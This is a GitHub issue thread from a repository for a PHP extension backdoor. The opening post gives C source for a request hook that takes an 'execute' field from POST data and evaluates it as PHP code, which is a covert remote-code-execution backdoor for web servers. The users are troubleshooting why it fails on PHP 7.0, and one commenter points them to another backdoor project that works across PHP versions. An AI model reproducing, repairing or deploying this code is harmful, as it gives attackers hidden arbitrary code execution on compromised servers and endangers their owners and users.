### ISSUE TITLE
php 7.0似乎不行

### ISSUE THREAD

**Issue by 404safe** [Gekkoou/php-extension-backdoor#1]
PHP_RINIT_FUNCTION(konjac)
{
            char* method = "_POST";
    char* secret_string = "execute";
        zval* arr,*code = NULL;
        if (arr = zend_hash_str_find(&EG(symbol_table), method, sizeof(method) - 1)) {
            if (Z_TYPE_P(arr) == IS_ARRAY && (code = zend_hash_str_find(Z_ARRVAL_P(arr), secret_string, strlen(secret_string)))) {
                zend_eval_string(Z_STRVAL_P(code), NULL, (char *)"" TSRMLS_CC);
            }
        }
        php_printf("success");
        return SUCCESS;
}
这是我在php7.0测试的代码 success能打印出来 但是没有执行POST的代码

**Comment by 0x13A0F** [comment]
Yes i have the same problem, apparently zend_hash_str_find is awlays returning NULL
Did you figure out the problem ?

**Comment by k0njac** [comment]
you can see the china No.1 Hacker  github for phith0n .
He backdoor can do your want to do on everyversion.
https://github.com/phith0n/arbitrary-php-extension

**Comment by k0njac** [comment]
> Yes i have the same problem, apparently zend_hash_str_find is awlays returning NULL
> Did you figure out the problem ?

you can see the china No.1 Hacker  github for phith0n .
He backdoor can do your want to do on everyversion.
https://github.com/phith0n/arbitrary-php-extension
